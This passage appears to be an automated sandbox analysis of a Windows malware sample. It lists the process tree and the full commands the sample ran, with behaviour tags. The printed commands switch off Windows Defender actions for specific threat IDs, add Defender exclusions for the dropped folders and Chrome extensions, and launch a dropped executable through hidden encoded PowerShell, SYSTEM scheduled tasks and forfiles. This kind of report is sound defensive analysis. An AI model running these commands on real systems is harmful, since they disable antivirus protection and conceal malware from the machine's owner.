  6⤵ "C:\Windows\system32\gpupdate.exe" /force
PID:4732
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵ powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4232 -
C:\Windows\SysWOW64\cmd.exe
  3⤵ "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
PID:1120
-
C:\Windows\SysWOW64\reg.exe
  4⤵ REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
PID:220
-
C:\Windows\SysWOW64\reg.exe
  3⤵ "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
PID:1420
-
C:\Windows\SysWOW64\reg.exe
  3⤵ "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
PID:2600
-
C:\Windows\SysWOW64\reg.exe
  3⤵ "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
- System Location Discovery: System Language Discovery
PID:3116 -
C:\Windows\SysWOW64\reg.exe
  3⤵ "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
PID:4924
-
C:\Windows\SysWOW64\reg.exe
  3⤵ "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
- System Location Discovery: System Language Discovery
PID:1128 -
C:\Windows\SysWOW64\reg.exe
  3⤵ "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
- System Location Discovery: System Language Discovery
PID:3280 -
C:\Windows\SysWOW64\reg.exe
  3⤵ "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
PID:3580
-
C:\Windows\SysWOW64\reg.exe
  3⤵ "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
PID:4332
-
C:\Windows\SysWOW64\reg.exe
  3⤵ "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
PID:680
-
C:\Windows\SysWOW64\reg.exe
  3⤵ "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
- System Location Discovery: System Language Discovery
PID:1064 -
C:\Windows\SysWOW64\reg.exe
  3⤵ "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
PID:376
-
C:\Windows\SysWOW64\reg.exe
  3⤵ "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
- System Location Discovery: System Language Discovery
PID:1440 -
C:\Windows\SysWOW64\reg.exe
  3⤵ "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
- System Location Discovery: System Language Discovery
PID:1448 -
C:\Windows\SysWOW64\reg.exe
  3⤵ "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
- System Location Discovery: System Language Discovery
PID:1416 -
C:\Windows\SysWOW64\reg.exe
  3⤵ "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
- System Location Discovery: System Language Discovery
PID:1476 -
C:\Windows\SysWOW64\reg.exe
  3⤵ "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
PID:2364
-
C:\Windows\SysWOW64\reg.exe
  3⤵ "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
- System Location Discovery: System Language Discovery
PID:1780 -
C:\Windows\SysWOW64\reg.exe
  3⤵ "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
PID:1988
-
C:\Windows\SysWOW64\reg.exe
  3⤵ "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
PID:2752
-
C:\Windows\SysWOW64\reg.exe
  3⤵ "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
- System Location Discovery: System Language Discovery
PID:4812 -
C:\Windows\SysWOW64\reg.exe
  3⤵ "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
PID:3008
-
C:\Windows\SysWOW64\reg.exe
  3⤵ "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
- System Location Discovery: System Language Discovery
PID:3852 -
C:\Windows\SysWOW64\reg.exe
  3⤵ "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
PID:3892
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:3348
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:3492
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:3180
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4312
-
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FDxSmxakU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FDxSmxakU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HIJHyLDMFVIrArjMcDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HIJHyLDMFVIrArjMcDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QSBDBQxFkAUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QSBDBQxFkAUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TjUkTRKCSiJkC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TjUkTRKCSiJkC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tEZYwqVfuQYU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tEZYwqVfuQYU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\IrAQtycGxHJKWAVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\IrAQtycGxHJKWAVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\XYiMwitzkSXbvcQKY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\XYiMwitzkSXbvcQKY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\BhywXhhbcuWpvQvH\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\BhywXhhbcuWpvQvH\" /t REG_DWORD /d 0 /reg:64;"
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 3024

    C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FDxSmxakU" /t REG_DWORD /d 0 /reg:32
      PID: 2168

      C:\Windows\SysWOW64\reg.exe
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FDxSmxakU" /t REG_DWORD /d 0 /reg:32
        - System Location Discovery: System Language Discovery
        PID: 860

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FDxSmxakU" /t REG_DWORD /d 0 /reg:64
      PID: 1700

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HIJHyLDMFVIrArjMcDR" /t REG_DWORD /d 0 /reg:32
      PID: 4100

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HIJHyLDMFVIrArjMcDR" /t REG_DWORD /d 0 /reg:64
      PID: 3216

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QSBDBQxFkAUn" /t REG_DWORD /d 0 /reg:32
      PID: 3452

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QSBDBQxFkAUn" /t REG_DWORD /d 0 /reg:64
      - System Location Discovery: System Language Discovery
      PID: 216

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TjUkTRKCSiJkC" /t REG_DWORD /d 0 /reg:32
      PID: 2052

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TjUkTRKCSiJkC" /t REG_DWORD /d 0 /reg:64
      PID: 3644

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tEZYwqVfuQYU2" /t REG_DWORD /d 0 /reg:32
      - System Location Discovery: System Language Discovery
      PID: 356

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tEZYwqVfuQYU2" /t REG_DWORD /d 0 /reg:64
      - System Location Discovery: System Language Discovery
      PID: 4104

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\IrAQtycGxHJKWAVB /t REG_DWORD /d 0 /reg:32
      PID: 4440

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\IrAQtycGxHJKWAVB /t REG_DWORD /d 0 /reg:64
      PID: 3924

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      - System Location Discovery: System Language Discovery
      PID: 1588

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      - System Location Discovery: System Language Discovery
      PID: 4664

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\XYiMwitzkSXbvcQKY /t REG_DWORD /d 0 /reg:32
      PID: 3444

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\XYiMwitzkSXbvcQKY /t REG_DWORD /d 0 /reg:64
      - System Location Discovery: System Language Discovery
      PID: 4220

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\BhywXhhbcuWpvQvH /t REG_DWORD /d 0 /reg:32
      - System Location Discovery: System Language Discovery
      PID: 2888

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\BhywXhhbcuWpvQvH /t REG_DWORD /d 0 /reg:64
      PID: 4316
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gHoIuxlqL" /SC once /ST 04:25:10 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    (the -EncodedCommand value decodes to: start-process -WindowStyle Hidden gpupdate.exe /force)
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID: 4920

  C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gHoIuxlqL"
    PID: 3196

  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gHoIuxlqL"
    PID: 4936

  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "hzhNAJUNSjjdIpELG" /SC once /ST 03:08:55 /RU "SYSTEM" /TR "\"C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\DhIGibW.exe\" AX /TcNOdidhp 385104 /S" /V1 /F
    - Drops file in Windows directory
    - Scheduled Task/Job: Scheduled Task
    PID: 2348

  C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "hzhNAJUNSjjdIpELG"
    - System Location Discovery: System Language Discovery
    PID: 4540

  C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2152 -s 944
    - Program crash
    PID: 2060

C:\Users\Admin\AppData\Local\Temp\service123.exe
  C:\Users\Admin\AppData\Local\Temp\/service123.exe
  - Executes dropped EXE
  - Loads dropped DLL
  PID: 1260

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  (the -EncodedCommand value decodes to: start-process -WindowStyle Hidden gpupdate.exe /force)
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 3212

  C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    PID: 4012

\??\c:\windows\system32\svchost.exe
  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
  PID: 2808

C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
  PID: 5056

\??\c:\windows\system32\gpscript.exe
  gpscript.exe /RefreshSystemParam
  PID: 4032
C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\DhIGibW.exe
  C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\DhIGibW.exe AX /TcNOdidhp 385104 /S
  - Checks computer location settings
  - Executes dropped EXE
  - Drops Chrome extension
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID: 4900

  C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    PID: 400

    C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
      - Indirect Command Execution
      PID: 1060

      C:\Windows\SysWOW64\cmd.exe
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        - System Location Discovery: System Language Discovery
        PID: 2632

        \??\c:\windows\SysWOW64\reg.exe
          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
          PID: 1084

    C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
      - Indirect Command Execution
      - System Location Discovery: System Language Discovery
      PID: 2512

      C:\Windows\SysWOW64\cmd.exe
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        - System Location Discovery: System Language Discovery
        PID: 1348

        \??\c:\windows\SysWOW64\reg.exe
          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
          PID: 1408

    C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
      - Indirect Command Execution
      PID: 1636

      C:\Windows\SysWOW64\cmd.exe
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        PID: 4992

        \??\c:\windows\SysWOW64\reg.exe
          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
          PID: 2004

    C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
      - Indirect Command Execution
      - System Location Discovery: System Language Discovery
      PID: 3364

      C:\Windows\SysWOW64\cmd.exe
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
